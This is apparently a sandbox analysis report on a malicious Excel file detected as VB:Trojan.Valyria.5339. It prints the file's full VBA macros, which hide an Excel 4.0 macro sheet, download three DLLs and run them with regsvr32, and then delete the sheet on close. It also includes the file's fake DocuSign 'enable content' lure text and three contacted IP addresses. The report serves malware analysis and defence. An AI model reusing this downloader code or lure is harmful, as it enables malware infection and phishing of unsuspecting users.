Malicious
Classifications | - |
Threat Names | VB:Trojan.Valyria.5339 |
Dynamic Analysis Report
Created on 2021-09-25T10:35:00
2013496fe5524988c28357245d684cdca787b47c0b3b16cae20b3222977d769b.xlsx.xls
Excel Document
File Name | Category | Type | Verdict |
---|---|---|---|
C:\Users\RDhJ0CNFevzX\Desktop\2013496fe5524988c28357245d684cdca787b47c0b3b16cae20b3222977d769b.xlsx.xls | Sample File | Excel Document | malicious |
File Reputation Information
Verdict | malicious |
AV Matches (2)
Threat Name | Verdict |
---|---|
VB:Trojan.Valyria.5339 | malicious |
VB:Trojan.Valyria.5339 | malicious |
Office Information
Creator | Test |
Last Modified By | Drywhtt |
Create Time | 2015-06-05 18:17:20+00:00 |
Modify Time | 2021-09-20 11:41:03+00:00 |
Codepage | ANSI_Cyrillic |
Application | Microsoft Excel |
App Version | 16.0 |
Document Security | NONE |
Titles Of Parts | Sheet1 |
scale_crop | False |
shared_doc | False |
Controls (1)
CLSID | Control Name | Associated Vulnerability |
---|---|---|
{00020820-0000-0000-C000-000000000046} | Excel97Sheet | - |
VBA Macros (2)
Macro #1: Module1
Attribute VB_Name = "Module1"
Sub auto_open()
On Error Resume Next
Application.ScreenUpdating = False
Set Fera = Excel4IntlMacroSheets
Fera.Add.Name = "Sheet3"
Sheets("Sheet3").Visible = False
Sheets("Sheet3").Range("A1:M100").Font.Color = vbWhite
Sheets("Sheet3").Range("H24") = UserForm1.Label1.Caption
Sheets("Sheet3").Range("H25") = UserForm1.Label3.Caption
Sheets("Sheet3").Range("H26") = UserForm1.Label4.Caption
Sheets("Sheet3").Range("K17") = "=NOW()"
Sheets("Sheet3").Range("K18") = ".dat"
Sheets("Sheet3").Range("H35") = "=HALT()"
Sheets("Sheet3").Range("I9") = UserForm1.Label2.Caption
Sheets("Sheet3").Range("I10") = UserForm1.Caption
Sheets("Sheet3").Range("I11") = "JJCCBB"
Sheets("Sheet3").Range("I12") = "Byukilos"
Sheets("Sheet3").Range("G10") = "..\Xertis.dll"
Sheets("Sheet3").Range("G11") = "..\Xertis1.dll"
Sheets("Sheet3").Range("G12") = "..\Xertis2.dll"
Sheets("Sheet3").Range("I17") = "regsvr32 -silent ..\Xertis.dll"
Sheets("Sheet3").Range("I18") = "regsvr32 -silent ..\Xertis1.dll"
Sheets("Sheet3").Range("I19") = "regsvr32 -silent ..\Xertis2.dll"
Sheets("Sheet3").Range("H10") = "=Byukilos(0,H24&K17&K18,G10,0,0)"
Sheets("Sheet3").Range("H11") = "=Byukilos(0,H25&K17&K18,G11,0,0)"
Sheets("Sheet3").Range("H12") = "=Byukilos(0,H26&K17&K18,G12,0,0)"
Sheets("Sheet3").Range("H9") = "=REGISTER(I9,I10&J10,I11,I12,,1,9)"
Sheets("Sheet3").Range("H17") = "=EXEC(I17)"
Sheets("Sheet3").Range("H18") = "=EXEC(I18)"
Sheets("Sheet3").Range("H19") = "=EXEC(I19)"
Application.Run Sheets("Sheet3").Range("H1")
End Sub
Sub auto_close()
On Error Resume Next
Application.ScreenUpdating = True
Application.DisplayAlerts = False
Sheets("Sheet3").Delete
Application.DisplayAlerts = True
End Sub
Macro #2: ThisWorkbook
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private m_openAlreadyRan As Boolean
Private m_isOpenDelayed As Boolean
Friend Sub FireOpenEventIfNeeded(Optional dummyVarToMakeProcHidden As Boolean)
If Not m_openAlreadyRan Then Workbook_Open
End Sub
Private Sub asWorkbook_Activateas()
On Error Resume Next
If m_isOpenDelayed Then
m_isOpenDelayed = False
InitWorkbook
End If
End Sub
Private Sub saWorkbook_Opensa()
On Error Resume Next
m_openAlreadyRan = True
Dim objProtectedViewWindow As ProtectedViewWindow
'
Set objProtectedViewWindow = Application.ProtectedViewWindows(Me.Name)
On Error GoTo 0
'
m_isOpenDelayed = Not (objProtectedViewWindow Is Nothing)
If Not m_isOpenDelayed Then InitWorkbook
End Sub
Private Sub ssaaInitWorkbookssaa()
On Error Resume Next
If VBA.Val(Application.Version) < 12 Then
MsgBox "This Workbook requires Excel 2007 or later!", vbCritical, "Closing"
Me.Close False
Exit Sub
End If
'
'Other code
'
'
'
End Sub
Extracted Image Texts (1)
Image 1: 0.JPG
DocuSign
Your DocuSign Document is Protected
VIEW COMPLETED DOCUMENT
THE STEPS ARE REQUIRED TO FULLY DECRYPT THE DOCUMENT,
ENCRYPTED BY DOCUSIGN.
DocuSign Document Application Instruction
1. Click on “ENABLE EDITING” button to unlock the document downloaded from the Internet.
2. Click on “ENABLE CONTENT” button to perform Microsoft Exel Decryption Core to start the decryption of
the document.
Do Not Share This Email
Ths email contains a secure information Picase do not share thes email, knk, of access informaton with others
I you need to modity the document of have questions aboul the dotats in tho document, please reach out to the sender by emailing them drectly,
CFB Streams (20)
Name | ID | Size |
---|---|---|
Root\Workbook | 1 | 176.57 KB |
Root\_VBA_PROJECT_CUR\VBA\ThisWorkbook | 4 | 2.94 KB |
Root\_VBA_PROJECT_CUR\VBA\Sheet1 | 5 | 991 Bytes |
Root\_VBA_PROJECT_CUR\VBA\UserForm1 | 6 | 1.17 KB |
Root\_VBA_PROJECT_CUR\VBA\Module1 | 7 | 3.68 KB |
Root\_VBA_PROJECT_CUR\VBA\__SRP_2 | 8 | 212 Bytes |
Root\_VBA_PROJECT_CUR\VBA\__SRP_3 | 9 | 206 Bytes |
Root\_VBA_PROJECT_CUR\VBA\_VBA_PROJECT | 10 | 3.77 KB |
Root\_VBA_PROJECT_CUR\VBA\dir | 11 | 864 Bytes |
Root\_VBA_PROJECT_CUR\VBA\__SRP_0 | 12 | 1.96 KB |
Root\_VBA_PROJECT_CUR\VBA\__SRP_1 | 13 | 138 Bytes |
Root\_VBA_PROJECT_CUR\UserForm1\f | 15 | 226 Bytes |
Root\_VBA_PROJECT_CUR\UserForm1\o | 16 | 272 Bytes |
Root\_VBA_PROJECT_CUR\UserForm1\CompObj | 17 | 97 Bytes |
Root\_VBA_PROJECT_CUR\UserForm1\VBFrame | 18 | 301 Bytes |
Root\_VBA_PROJECT_CUR\PROJECTwm | 19 | 116 Bytes |
Root\_VBA_PROJECT_CUR\PROJECT | 20 | 603 Bytes |
Root\SummaryInformation | 21 | 208 Bytes |
Root\DocumentSummaryInformation | 22 | 240 Bytes |
Root\CompObj | 23 | 103 Bytes |
Extracted URLs (3)
URL | WHOIS Data | Reputation Status | Recursively Submitted |
---|---|---|---|
http://103.155.92.211 | Not Queried | N/A | - |
http://193.38.54.149 | Not Queried | N/A | - |
http://94.140.114.44 | Not Queried | N/A | - |

File Name | Category | Type | Verdict |
---|---|---|---|
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\counters.dat | Modified File | Stream | clean |
c:\users\rdhj0cnfevzx\appdata\roaming\microsoft\forms\excel.box | Dropped File | Unknown | clean |
c:\users\rdhj0cnfevzx\appdata\local\temp\~dfcf87438905ed2d8b.tmp | Dropped File | OLE Compound | clean. Known to be clean. |
c:\users\rdhj0cnfevzx\appdata\local\temp\~df47fd94e12aafce74.tmp | Dropped File | Stream | clean. Known to be clean. |